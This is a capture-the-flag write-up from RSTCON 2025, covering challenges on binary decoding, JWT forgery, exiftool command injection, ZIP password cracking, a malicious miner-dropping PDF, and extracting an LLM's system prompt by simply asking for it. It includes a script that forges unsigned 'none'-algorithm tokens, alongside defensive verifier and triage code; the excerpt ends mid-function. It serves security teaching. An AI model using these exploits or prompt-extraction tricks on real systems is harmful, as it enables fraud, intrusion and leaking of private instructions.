RSTCON 2025 - WriteUp

October 25, 2025

Challenge: Office Softbinary (cryptography)

Description: My coworkers started emailing each other with this weird looking code, can you figure out what they’re saying? I need to know what’s going on with the office softball game!

Terminal window
01001101 01100101 01110100 01100001 01000011 01010100 01000110 01111011 01101000 00110011 01011111 01101000 00110001 00110111 01011111 01110100 01101000 00110011 01011111 01100010 00110100 01101100 00110001 01011111 00110100 01101110 01100100 01011111 01100111 00110000 01110100 01011111 01110100 00110000 01011111 01110011 00110011 01100011 00110000 01101110 01100100 01011111 01100010 00110100 00110101 00110011 01111101

🏁 Flag format: MetaCTF{…}


Trying the Binary

Since the code looked like binary, I saved it to a file:

Terminal window
echo '01001101 01100101 01110100 01100001 01000011 01010100 01000110 01111011 01101000 00110011 01011111 01101000 00110001 00110111 01011111 01110100 01101000 00110011 01011111 01100010 00110100 01101100 00110001 01011111 00110100 01101110 01100100 01011111 01100111 00110000 01110100 01011111 01110100 00110000 01011111 01110011 00110011 01100011 00110000 01101110 01100100 01011111 01100010 00110100 00110101 00110011 01111101' > softbinary.txt

Then I decoded it using this command:

Terminal window
perl -lpe '$_=pack("B*",join("",split(" ")))' softbinary.txt

🏁 Flag

Terminal window
MetaCTF{h3_h17_th3_b4l1_4nd_g0t_t0_s3c0nd_b453}

Challenge: Horse Source (web)

Description: I’ve been working on a fun javascript based game to play horse with a computer, would you like to give it a shot?

Check out the game here.

PS: Maybe you’ll find my easter egg in the code…

🏁 Flag format: MetaCTF{…}


Landing page


Analyzing the source code

I inspected the source code and found the flag hidden in a comment:

Terminal window
MetaCTF{y0u_g0t_4_l1c3n5e_f0r_th4t_h0rs3_m4t3}

🏁 Flag

Terminal window
MetaCTF{y0u_g0t_4_l1c3n5e_f0r_th4t_h0rs3_m4t3}

Challenge: Spam? (reverse engineering)

Description: Our corporate email gateway flagged a message. Here’s the raw export of it. Can you see what’s in it?

🏁 Flag format: MetaCTF{…}


Analyzing the email

The attachment is a base64-encoded PNG embedded in the raw email.

Delivered-To: netspark@metactf.com
Received: by 10.36.33.216 with SMTP id e207csp2066718ita;
Tue, 27 Oct 2015 22:48:01 -0700 (PDT)
X-Received: by 10.182.16.226 with SMTP id j2mr32770358obd.4.1446011281654;
Tue, 27 Oct 2015 22:48:01 -0700 (PDT)
Return-Path: <contact@metactf.com>
Received: from mail-oi0-x229.google.com (mail-oi0-x229.google.com. [2607:f8b0:4003:c06::229])
by mx.google.com with ESMTPS id s128si16353256oig.118.2015.10.27.22.48.01
for <netspark@metactf.com>
(version=TLSv1.2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128);
Tue, 27 Oct 2015 22:48:01 -0700 (PDT)
Received-SPF: pass (google.com: domain of contact@metactf.com designates 2607:f8b0:4003:c06::229 as permitted sender) client-ip=2607:f8b0:4003:c06::229;
Authentication-Results: mx.google.com;
spf=pass (google.com: domain of contact@metactf.com designates 2607:f8b0:4003:c06::229 as permitted sender) smtp.mailfrom=contact@metactf.com;
dkim=pass header.i=@gmail.com;
dmarc=pass (p=NONE dis=NONE) header.from=gmail.com
Received: by mail-oi0-x229.google.com with SMTP id s66so83023344oie.1
for <netspark@metactf.com>; Tue, 27 Oct 2015 22:48:01 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
d=gmail.com; s=20120113;
h=mime-version:date:message-id:subject:from:to:content-type;
bh=Yu+JZItOgwAy12c+kj3AXu1scr8uu7bs5ASGzTGC9hY=;
b=S/+xYaZvBG5DStmiVR6LeRaVgYbxXfkeLvfgeMlVO/MRm7zvf7L+vh4RXBI+eM+VdY
M1VPA2YvO25I9JwW0Wxts0NyVU61MkpxVhKgGvlvUUgDgLfZmRqb9qizq9BUJ5bAR3Q1
zdnaK0FTzjgUkbD6pcNB1RRxsKwA7p5ziAE7fjcc3zkiqo6tmiPVzfE3v1FURuuMKmeC
t7l+cbCgWOZQ+Y/d3pInvd/q+4dSdBwWOvsPPth6lRGpmucSyi7UkHnkv5qR1QIxI0Ef
i/EdikXah1v+je4Y6OXN6KrDz/RURlzNmIrJPV1oY13H4tfdK3EyYDb5nqMoWpp9pa6U
MqnA==
MIME-Version: 1.0
X-Received: by 10.202.94.133 with SMTP id s127mr30725847oib.92.1446011281365;
Tue, 27 Oct 2015 22:48:01 -0700 (PDT)
Received: by 10.202.54.138 with HTTP; Tue, 27 Oct 2015 22:48:01 -0700 (PDT)
Date: Wed, 28 Oct 2015 01:48:01 -0400
Message-ID: <CAMSY=h+RVrPMyApq_uEsv4_a91KVC5hVG4uU4w_mTYpA9nFKxw@mail.gmail.com>
Subject: Hi!
From: PI CIT <contact@metactf.com>
To: Roman Bohuk <netspark@metactf.com>
Content-Type: multipart/mixed; boundary=001a113d4a2ec510b5052323bcf2

--001a113d4a2ec510b5052323bcf2
Content-Type: multipart/alternative; boundary=001a113d4a2ec510a9052323bcf0

--001a113d4a2ec510a9052323bcf0
Content-Type: text/plain; charset=UTF-8

I've attached an image to this email. It should have everything you need.
--001a113d4a2ec510a9052323bcf0
Content-Type: text/html; charset=UTF-8

<div dir="ltr">I&#39;ve attached an image to this email. It should have everything you need.</div>
--001a113d4a2ec510a9052323bcf0--
--001a113d4a2ec510b5052323bcf2
Content-Type: image/png; name="flag.png"
Content-Disposition: attachment; filename="flag.png"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_igadrkr30

[base64-encoded PNG body omitted]
--001a113d4a2ec510b5052323bcf2--

Recovery Steps

  1. Extract the base64 block and decode it to a PNG.

  2. Render the PNG (both steps done in CyberChef).
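The same two steps can be done without a GUI by letting the standard MIME parser find the attachment and undo the transfer encoding. The script below is an added example, not part of the original writeup; the message it parses is a constructed stand-in for the raw export (same structure, a PNG signature instead of the real image), and the magic-byte check is there because the declared Content-Type of an attachment is attacker-controlled and should never be trusted on its own.

```python
import base64
import email
import os
from email import policy

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

# Constructed sample: the 8-byte PNG signature plus the start of an IHDR chunk.
# It is enough to exercise the magic-byte check; it is not a renderable image.
SAMPLE_PNG = PNG_SIGNATURE + b"\x00\x00\x00\x0dIHDR"

# Constructed sample message with the same multipart layout as the flagged export.
RAW_EMAIL = (
    "From: sender@example.invalid\r\n"
    "To: analyst@example.invalid\r\n"
    "Subject: Hi!\r\n"
    "MIME-Version: 1.0\r\n"
    "Content-Type: multipart/mixed; boundary=BOUNDARY\r\n"
    "\r\n"
    "--BOUNDARY\r\n"
    "Content-Type: text/plain; charset=UTF-8\r\n"
    "\r\n"
    "I've attached an image to this email.\r\n"
    "--BOUNDARY\r\n"
    'Content-Type: image/png; name="flag.png"\r\n'
    'Content-Disposition: attachment; filename="flag.png"\r\n'
    "Content-Transfer-Encoding: base64\r\n"
    "\r\n"
    + base64.b64encode(SAMPLE_PNG).decode()
    + "\r\n--BOUNDARY--\r\n"
)


def extract_attachments(raw: str) -> list[dict]:
    """Walk every MIME part and return decoded attachments with a magic-byte verdict."""
    msg = email.message_from_string(raw, policy=policy.default)
    found = []
    for part in msg.walk():
        if part.get_content_disposition() != "attachment":
            continue
        data = part.get_payload(decode=True)  # undoes base64 / quoted-printable
        found.append({
            "filename": part.get_filename(),
            "declared_type": part.get_content_type(),
            "size": len(data),
            # Compare the bytes with what a PNG must start with, not the declared type
            "is_png": data.startswith(PNG_SIGNATURE),
            "data": data,
        })
    return found


def save_attachments(raw: str, outdir: str) -> list[str]:
    """Write each attachment to outdir; basename() strips any path in the filename."""
    os.makedirs(outdir, exist_ok=True)
    written = []
    for att in extract_attachments(raw):
        name = os.path.basename(att["filename"] or "unnamed.bin")
        path = os.path.join(outdir, name)
        with open(path, "wb") as fh:
            fh.write(att["data"])
        written.append(path)
    return written


if __name__ == "__main__":
    for att in extract_attachments(RAW_EMAIL):
        print(att["filename"], att["declared_type"], att["size"], "PNG" if att["is_png"] else "NOT PNG")
```

Running it on the real export means reading the .eml file into `raw` instead of using the constructed message; `save_attachments` then drops the decoded PNG into a folder you can open in any image viewer.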


🏁 Flag

Terminal window
MetaCTF{wasnt_base_10_more_than_enough_already}

Challenge: Large Language Protocol (misc)

Description: I got tired of manually implementing so many network protocols, so why not just let an LLM respond as every network protocol? I just really hope no one can steal my proprietary prompt…


Try prompt injection

Simply asking the LLM for its system prompt worked. I think it works with any protocol, but you have to try a few times.


🏁 Flag

Terminal window
MetaCTF{pr0m7_1nj3c710n_1n_3v3ry_pr0t0c0l}

Challenge: TruncShop (misc)

Description: Welcome to TruncShop! We’ve built a secure shopping system using precise numerical calculations. Our currency converter is state-of-the-art and ensures you can’t get more than what you pay for. Can you find a way to bypass our checks and purchase the flag item?


Analyzing the challenge

The shop has an item called “Secure Flag Vault” that costs 100.00 coins / 33 gems.


Trying buy and sell functionality

With the initial coins I tried buying 2 coffees and selling them back, and noticed that I received the payment in gems instead of coins.


Exploiting truncation

With that I tried exchanging gems back to coins. Given the challenge name “TruncShop”, it seemed likely to be vulnerable to a truncation attack, so I tried exchanging 1.9999999999 gems to coins, and it worked: the program treated 1.9999999999 gems as 2 gems and gave me 5.99 coins, but only deducted 1 gem from my balance.


Buying the flag

With that, I exchanged gems to coins repeatedly until I had enough coins to buy the flag.
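The bug comes from applying two different precision rules to the two sides of one trade: the credited coins are rounded while the debited gems are truncated, so a fractional amount is worth more going out than it costs coming in. The snippet below is an added example (not the TruncShop source, which is not shown in the writeup) with a vulnerable converter next to a hardened one. The exchange rate of 2.995 coins per gem is an assumption chosen so the vulnerable path reproduces the 5.99-coins-for-1-gem result seen above.

```python
from decimal import Decimal, ROUND_DOWN

# Hypothetical rate: the real TruncShop rate is not known from the writeup.
RATE_F = 2.995
RATE = Decimal("2.995")
CENT = Decimal("0.01")


def vulnerable_exchange(gem_balance: float, gems: float) -> tuple[float, float]:
    """Credit is rounded to the nearest cent, debit is truncated to a whole gem."""
    if gems <= 0 or gems > gem_balance:
        raise ValueError("invalid amount")
    coins_out = round(gems * RATE_F, 2)  # 1.9999999999 * rate rounds UP to 5.99
    gem_balance -= int(gems)             # int() truncates 1.9999999999 DOWN to 1
    return gem_balance, coins_out


def safe_exchange(gem_balance, gems) -> tuple[Decimal, Decimal]:
    """One fixed precision, validated on input and applied identically to both sides."""
    gem_balance, gems = Decimal(str(gem_balance)), Decimal(str(gems))
    # Reject amounts finer than the currency allows instead of silently rounding them
    if gems != gems.quantize(CENT):
        raise ValueError("amount has more precision than the currency allows")
    if gems <= 0 or gems > gem_balance:
        raise ValueError("invalid amount")
    # Round the credited side DOWN, so rounding can never favour the customer
    coins_out = (gems * RATE).quantize(CENT, rounding=ROUND_DOWN)
    return gem_balance - gems, coins_out


def rejected(gem_balance, gems) -> bool:
    """True when the hardened converter refuses the trade."""
    try:
        safe_exchange(gem_balance, gems)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    print("vulnerable:", vulnerable_exchange(5.0, 1.9999999999))  # balance 4.0, 5.99 coins out
    print("hardened:  ", safe_exchange("5", "1.99"))             # balance 3.01, 5.96 coins out
    print("1.9999999999 gems rejected:", rejected("5", "1.9999999999"))
```

The hardened version also uses `Decimal` built from strings rather than binary floats, so 1.99 is exactly 1.99 and the precision check is meaningful; with floats the same check would be defeated by representation error.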


🏁 Flag

Terminal window
MetaCTF{7rUnC4t10n_C4n_L34d_70_Un3xp3c73d_V4lu35}

Challenge: MetaLens Pro (web)

Description: Welcome to MetaLens Pro, our state-of-the-art image metadata analysis platform. Security researchers have raised concerns about potential vulnerabilities in our processing pipeline.

Can you demonstrate how an attacker might compromise our systems?

🏁 Flag format: MetaCTF{…}


Analyzing the upload functionality

I inspected the upload functionality and noticed that the application runs the exiftool command to extract metadata from uploaded images, and that the exiftool version is displayed.


Finding the payload

I researched the exiftool version 12.23 and found that it is vulnerable to command execution via specially crafted metadata.

Crafting the payload

I found a github repository that provides a payload generator for exiftool command injection.


Generating the malicious image

I used the generator to create a payload that would execute a command to read the flag file.


Uploading the payload

I uploaded the crafted image with the malicious metadata to the MetaLens Pro application. On processing, the application executed the injected command, which let me list the files in the directory.


Retrieving the flag

Using the same command injection in exiftool, I was then able to read the flag file.


🏁 Flag

Terminal window
MetaCTF{exif_to0l_versi0n_c4n_kill_you}

Challenge: None Shall Pass (web)

Description: We built a cool website that uses JWT for authentication. Simple and safe, right? Or is it…?

🏁 Flag format: MetaCTF{…}


Analyzing the web application

When you first open MetaShop, it just looks like a normal shop landing page. There’s Login / Register in the top right.


Registering a new user

So the first thing we do is register, then log in.


Browsing the products

On the products page, we see a bunch of items: laptops, phones, earbuds, etc. In the navbar it says: Your Balance: $10.0

Then we scroll down and see something interesting: there's an item literally called FLAG, priced at $1337.00. So yeah, the site is selling the flag as an item in the store. The problem: we're broke. We only have $10 and the flag costs $1337.


Also after logging in, the app sets a cookie for us. That cookie is a JWT.


Decoding the JWT

We can decode the JWT using any online tool. The payload contains our user information: user_id and balance etc. Key detail: the JWT payload literally includes balance: 10. So balance is not stored server-side only. It’s stored INSIDE THE TOKEN that lives in our browser. Which means if we edit this, and the site is dumb enough to trust it, we basically generate money out of thin air.


Modifying the JWT

Terminal window
import base64
import json

# Placeholder identity values ("xxx" in the original); use the ones from your own decoded token
USER_ID = 0
USERNAME = "xxx"

# Original payload with the balance increased
payload = {
    "user_id": USER_ID,
    "username": USERNAME,
    "balance": 999999,
    "role": "user",
    "exp": 1761461938
}

# Different spellings of the "none" algorithm, in case the check is case-sensitive
algorithms = ["none", "None", "NONE", "nOne"]

for alg in algorithms:
    header = {"alg": alg, "typ": "JWT"}
    # Encode header and payload as base64url without padding
    header_encoded = base64.urlsafe_b64encode(json.dumps(header).encode()).decode().rstrip('=')
    payload_encoded = base64.urlsafe_b64encode(json.dumps(payload).encode()).decode().rstrip('=')
    # Token with an empty signature segment
    token = f"{header_encoded}.{payload_encoded}."
    print(f"Algorithm '{alg}': {token}")

I modified the JWT payload to increase my balance to a ridiculous amount. I also changed the algorithm in the header to “none” to bypass signature verification. Since some frameworks compare the algorithm name case-sensitively, I tried the variations “none”, “None”, “NONE” and “nOne”.
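What the server should have done is the mirror image of that script: treat the `alg` header as untrusted input, compare it against the one algorithm the service actually uses, and verify the HMAC before reading a single claim. The verifier below is an added example written for this writeup, not MetaShop's code; it uses only the standard library (no PyJWT), a constructed demo key, and an `exp` value matching the payload above. The unsigned-token builder is the same construction as the script above, kept here only so the verifier can be tested against it.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

SECRET = b"constructed-demo-secret"  # placeholder key, not the challenge's


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).decode().rstrip("=")


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(payload: dict, key: bytes = SECRET) -> str:
    """Issue a token: header.payload signed with HMAC-SHA256."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = f"{b64url_encode(json.dumps(header).encode())}.{b64url_encode(json.dumps(payload).encode())}"
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def verify_hs256(token: str, key: bytes = SECRET, now: Optional[float] = None) -> dict:
    """Return the claims only for a well-formed, HS256-signed, unexpired token."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
    except ValueError:  # wrong segment count, bad base64, bad JSON
        raise ValueError("malformed token")
    # The algorithm is pinned server-side. The header's alg is compared against it,
    # never used to pick a verifier, so "none" in any capitalisation is refused.
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        raise ValueError(f"unexpected alg {header.get('alg') if isinstance(header, dict) else None!r}")
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    claims = json.loads(b64url_decode(payload_b64))
    if (now if now is not None else time.time()) >= claims.get("exp", 0):
        raise ValueError("token expired")
    return claims


def accepted(token: str, now: float) -> bool:
    try:
        verify_hs256(token, now=now)
        return True
    except ValueError:
        return False


def forged_none_token(payload: dict, alg: str = "none") -> str:
    """Unsigned token of the shape built in the writeup (for testing the verifier)."""
    header = {"alg": alg, "typ": "JWT"}
    return f"{b64url_encode(json.dumps(header).encode())}.{b64url_encode(json.dumps(payload).encode())}."


def tamper_balance(token: str, new_balance: int) -> str:
    """Keep a valid signature but swap the payload: must fail verification."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    claims = json.loads(b64url_decode(payload_b64))
    claims["balance"] = new_balance
    return f"{header_b64}.{b64url_encode(json.dumps(claims).encode())}.{sig_b64}"


if __name__ == "__main__":
    claims = {"user_id": 1, "username": "demo", "balance": 10, "role": "user", "exp": 1761461938}
    good = sign_hs256(claims)
    print("signed token accepted:", accepted(good, now=1700000000))
    print("alg=nOne accepted:    ", accepted(forged_none_token(dict(claims, balance=999999), "nOne"), now=1700000000))
    print("tampered accepted:    ", accepted(tamper_balance(good, 999999), now=1700000000))
```

Even with this verifier the design stays fragile: a signed `balance` claim is still a snapshot that can be replayed after a purchase until `exp`. The balance belongs in the server's datastore, looked up by `user_id`, with the token carrying identity only.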


Using the modified JWT

I replaced my JWT cookie with the modified token. Now when I refresh the page, my balance shows as $999999. With all that fake money, I can finally buy the flag item.


🏁 Flag

Terminal window
MetaCTF{JWT_Non3_4lg_3xpl01t}

Challenge: Banksman (forensics)

Description: Our professor received a report from an unfamiliar student and realized that something about it wasn’t right and turned it into a research assignment. Analyze the file. Is there anything mysterious embedded in it?

Download the “report” in question to solve the challenge

🏁 Flag format: MetaCTF{…}


Looking at the PDF

The file we get is report.pdf. When you open it in a PDF viewer, it just looks like a normal academic paper about animal research ethics. Nothing obviously evil. Which is exactly what evil looks like, tbh. So instead of trusting the UI, we start doing static analysis.


Basic PDF triage with pdfid

Terminal window
pdfid report.pdf

The output shows some interesting entries:

/JavaScript 1
/JS 1
/OpenAction 1

Those fields are red flags in PDF land.

Quick breakdown:

  • /JavaScript and /JS means there’s embedded JavaScript inside the PDF.
  • /OpenAction means “run this action automatically when the PDF is opened.”

So yeah. This “research report” tries to run JavaScript on open. At this point we know there’s code in there. Next step is to extract it.


Dig into the objects with pdf-parser

Terminal window
pdf-parser --search javascript report.pdf

Searching for anything related to JavaScript, we find object 5 0:

Terminal window
pdf-parser --object 5 --filter --raw report.pdf > js.txt

We eventually get the dumped output for object 5 0:

The /JS key is followed by a huge blob of hex. That blob is the actual script the PDF wants to run. So the JavaScript is hidden in object 5, and it’s getting executed automatically using /OpenAction. Classic malicious PDF behavior.
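The two pdfid/pdf-parser steps above (count the dangerous names, then pull the /JS value out of the object and undo its hex encoding) are small enough to reproduce in a few lines, which is handy when triaging a batch of PDFs in a pipeline rather than one at a time. The script below is an added example and not the tools' source; it runs on a constructed PDF skeleton whose catalog has an /OpenAction pointing at a JavaScript action with a hex-string /JS, the same shape the writeup describes for report.pdf. It only handles plain (unfiltered) objects and unescaped strings, so it complements pdf-parser's `--filter` rather than replacing it.

```python
import binascii
import re

# Names pdfid counts; the three the writeup highlights come first.
SUSPICIOUS_NAMES = [b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch", b"/EmbeddedFile"]

# Constructed sample: catalog -> /OpenAction -> JavaScript action with a hex-encoded /JS string.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
    b"5 0 obj << /S /JavaScript /JS <"
    + binascii.hexlify(b"app.alert('constructed sample script');")
    + b"> >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)


def count_names(pdf: bytes) -> dict:
    """Count each suspicious name as a whole token, like pdfid does."""
    counts = {}
    for name in SUSPICIOUS_NAMES:
        # A name token ends at whitespace or a delimiter, so /JS must not match /JSomething
        pattern = re.escape(name) + rb"(?![A-Za-z0-9_])"
        counts[name.decode()] = len(re.findall(pattern, pdf))
    return counts


def extract_js_strings(pdf: bytes) -> list:
    """Return /JS values given inline as hex strings <...> or literal strings (...)."""
    scripts = []
    for m in re.finditer(rb"/JS\s*<([0-9A-Fa-f\s]*)>", pdf):
        hexdata = re.sub(rb"\s", b"", m.group(1))
        if len(hexdata) % 2:
            hexdata += b"0"  # PDF treats a missing final hex digit as 0
        scripts.append(binascii.unhexlify(hexdata).decode("latin-1"))
    for m in re.finditer(rb"/JS\s*\((.*?)\)", pdf, re.S):
        # Naive: does not handle escaped or nested parentheses inside the literal
        scripts.append(m.group(1).decode("latin-1"))
    return scripts


def triage(pdf: bytes) -> dict:
    """pdfid-style summary plus the decoded scripts and an 'auto-runs JS' verdict."""
    counts = count_names(pdf)
    has_js = counts["/JS"] > 0 or counts["/JavaScript"] > 0
    return {
        "names": counts,
        "scripts": extract_js_strings(pdf),
        "auto_runs_js": has_js and (counts["/OpenAction"] > 0 or counts["/AA"] > 0),
    }


if __name__ == "__main__":
    report = triage(SAMPLE_PDF)
    for name, n in report["names"].items():
        if n:
            print(f"{name:14} {n}")
    print("auto-runs JS:", report["auto_runs_js"])
    for script in report["scripts"]:
        print("decoded /JS:", script)
```

On a real sample, read the file in binary mode and pass the bytes to `triage`; if the count of `/JS` is non-zero but `extract_js_strings` returns nothing, the script is inside a filtered stream and pdf-parser's `--filter --raw` is the next step, exactly as above.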


Decoding the JavaScript

After decoding, we get a .js file. The code looks sketchy in exactly the way you'd expect malware to look sketchy.


Send it to VirusTotal

We take the decoded JS and upload to VirusTotal to see what behavior it shows. Result: 32/62 vendors flag it as malicious.


Dropped payload analysis

In the Relations tab, we get something super useful: The sandbox shows that this script eventually produces/drops another file called word.exe.

We follow the trail and open the sandbox report for word.exe.


Behavior of word.exe

The sandbox report for word.exe says: 52/73 vendors flag it as malicious


Finding the flag in process arguments

Scrolling through process activity, we see commands that the malware runs. One of them is launching a miner (cryptominer), and it passes in credentials / worker name / pool info on the command line. Inside that command line we see:

Terminal window
MetaCTF{I_4m_n0t_@_m1n3r_1_@m_a_b4nk5m4n}

🏁 Flag

Terminal window
MetaCTF{I_4m_n0t_@_m1n3r_1_@m_a_b4nk5m4n}

Challenge: Predictable Password Protection (cryptography)

Description: We intercepted this sysadmin emailing himself password csv backups, and it seems like his master passwords are predictably weak. Our analysts were able to crack all but the latest dump, can you crack the first 5, find a pattern, then crack the 6th?

Download all 6 password dumps here.

🏁 Flag format: MetaCTF{…}


Extract the dump and look around

We start with the provided password_dumps.zip. Unzip that first layer to get all the inner password dumps.

So yeah, six ZIPs inside.

When we try to unzip one (like passwords.zip) we are immediately prompted for a password.


Crack the ZIP password with John

We can’t unzip without the password, so we’re going to crack the ZIPs using john (John the Ripper). Format for encrypted ZIP is pkzip, so John supports it out of the box.

Workflow is basically:

  • Get the hash from the ZIP.
  • Feed that hash to john with a wordlist.

Example: cracking passwords.zip

We grab its hash (ZIP hashes can be extracted with zip2john):

Terminal window
$ zip2john passwords.zip > hash1

Then:

Terminal window
john --format=pkzip --wordlist=/usr/share/wordlists/rockyou.txt hash1
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
naruto427 (passwords.zip/passwords.csv)
Session completed.

John cracked it:

naruto427 (passwords.zip/passwords.csv)

So the first archive uses a basic password (anime + numbers). This is our signal that the rest is predictable.


Crack the last one using the pattern

I generate a custom wordlist based on that pattern (probably anime titles + common numeric suffixes). Then re-run john just on the stubborn hash:

Terminal window
john --format=pkzip --wordlist=wordlist_numbered.txt all_hashes.txt
Loaded 6 password hashes with 6 different salts (PKZIP [32/64])
Remaining 1 password hash
Will run 4 OpenMP threads
Chainsawman715 (passwords6.zip/passwords.csv)
Session completed.

So the uncracked archive (passwords6.zip) ended up using:

Chainsawman715

Which fits the exact same pattern:

“Chainsawman” (anime/manga) + numbers (715)
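The "title + digits" observation can be made mechanical, which is also how a password audit spots the same weakness before someone else does: reduce each password to a structural mask (runs of letters, digits and symbols with their lengths) and look at how concentrated the masks are. The snippet below is an added example, not part of the writeup; it uses the two cracked passwords quoted above as input, with the mask notation being my own.

```python
import re
from collections import Counter

# The two cracked passwords quoted in the writeup (the other four dumps are not shown).
CRACKED = ["naruto427", "Chainsawman715"]


def mask(password: str) -> str:
    """Structural mask: runs of letters (L), digits (D) and other (S) with lengths, e.g. L6D3."""
    parts = []
    for run in re.findall(r"[A-Za-z]+|[0-9]+|[^A-Za-z0-9]+", password):
        cls = "L" if run[0].isalpha() else "D" if run[0].isdigit() else "S"
        parts.append(f"{cls}{len(run)}")
    return "".join(parts)


def shape(password: str) -> str:
    """Mask with the lengths dropped: 'naruto427' and 'Chainsawman715' both become 'LD'."""
    return re.sub(r"\d+", "", mask(password))


def dominant_shape(passwords) -> tuple:
    """Most common shape in the set and the fraction of passwords sharing it."""
    counts = Counter(shape(p) for p in passwords)
    top, n = counts.most_common(1)[0]
    return top, n / len(passwords)


def matches_dominant(candidate: str, passwords) -> bool:
    """Policy-style check: does the candidate follow the structure the cracked set exposes?"""
    return shape(candidate) == dominant_shape(passwords)[0]


if __name__ == "__main__":
    for pw in CRACKED:
        print(f"{pw:16} mask={mask(pw):7} shape={shape(pw)}")
    print("dominant shape:", dominant_shape(CRACKED))
    print("would 'Onepiece123' fit the pattern?", matches_dominant("Onepiece123", CRACKED))
```

A set whose dominant shape covers 100% of the samples, as here, tells an auditor that a dictionary of the matching word class plus a three-digit suffix is all a cracker needs, which is precisely the wordlist the next step builds.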

Once we have that password, we can finally unzip the final dump.


Extract the final CSV and read it

Now that we know the password for passwords6.zip is Chainsawman715, we can unzip it.

Then just read the CSV:

Terminal window
$ cat passwords.csv
Service,Username,Password
AdminPanel,admin_user,AlchemyCircleCore
MailServer,sysadmin,FullMetalBarrel
...
DomainAdmin,MetaCTF{chainsaw_hashes_to_shreads}

So the CSV from the most recent dump literally hands us the flag.


🏁 Flag

Terminal window
MetaCTF{chainsaw_hashes_to_shreads}

Challenge: Flag Portfolio (Reconnaissance)

Description: I just “drew” this pixel art image using my own toolset! I’m not allowed to self-advertise my content here but I trust you’ll be able to find it if you’re smart enough :)

The flag format is MetaCTF{WORD1_WORD2_WORD3} where each word is an animal/creature.

🏁 Flag format: MetaCTF{…}


Look at the provided image’s metadata

I start by looking at the provided pixel art image locally. I run exiftool to dump its metadata.

The metadata is super revealing:

It logs the exact model checkpoint: "ckpt_name": "plantMilkModelSuite_walnut.safetensors"

It logs the LoRA used: "lora_name": "pixelartmodel_super1337.safetensors"

Those names are my pivot points.
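The model names leak because image generators write their workflow into the PNG's text chunks, and exiftool simply prints those chunks. The parser below is an added example (not exiftool and not the challenge's tooling) that walks the PNG chunk structure directly, decodes tEXt/zTXt/iTXt, searches the text for the two key names seen above, and shows the counter-measure: rewriting the file without its text chunks before publishing. The PNG it runs on is constructed inline (a 1x1 image carrying a made-up workflow JSON in a tEXt chunk keyed "prompt"; the key name is an assumption, the values are the ones from the writeup).

```python
import json
import re
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
TEXT_CHUNKS = (b"tEXt", b"zTXt", b"iTXt")
MODEL_KEYS = ("ckpt_name", "lora_name")


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


# Constructed sample: 1x1 RGB PNG with a workflow JSON blob in a tEXt chunk.
WORKFLOW = {"3": {"inputs": {"ckpt_name": "plantMilkModelSuite_walnut.safetensors"}},
            "4": {"inputs": {"lora_name": "pixelartmodel_super1337.safetensors"}}}
SAMPLE_PNG = (
    PNG_SIGNATURE
    + png_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0))
    + png_chunk(b"tEXt", b"prompt\x00" + json.dumps(WORKFLOW).encode("latin-1"))
    + png_chunk(b"IDAT", zlib.compress(b"\x00\x00\x00\x00"))
    + png_chunk(b"IEND", b"")
)


def iter_chunks(png: bytes):
    """Yield (type, data) for every chunk, verifying each CRC."""
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        data = png[pos + 8:pos + 8 + length]
        crc = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])[0]
        if zlib.crc32(ctype + data) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC in {ctype!r} chunk")
        yield ctype, data
        pos += 12 + length
        if ctype == b"IEND":
            break


def text_chunks(png: bytes) -> dict:
    """Decode tEXt, zTXt and iTXt chunks into {keyword: text}."""
    out = {}
    for ctype, data in iter_chunks(png):
        if ctype == b"tEXt":
            key, _, value = data.partition(b"\x00")
            out[key.decode("latin-1")] = value.decode("latin-1")
        elif ctype == b"zTXt":
            key, _, rest = data.partition(b"\x00")  # rest[0] is the compression method (0 = deflate)
            out[key.decode("latin-1")] = zlib.decompress(rest[1:]).decode("latin-1")
        elif ctype == b"iTXt":
            key, _, rest = data.partition(b"\x00")
            compressed = rest[0]                       # then compression method, language, translated key
            _lang, _, rest = rest[2:].partition(b"\x00")
            _tkey, _, text = rest.partition(b"\x00")
            out[key.decode("latin-1")] = (zlib.decompress(text) if compressed else text).decode("utf-8")
    return out


def find_model_references(png: bytes) -> dict:
    """Every ckpt_name / lora_name value found in any text chunk, keyed by key name."""
    hits = {}
    for text in text_chunks(png).values():
        for key in MODEL_KEYS:
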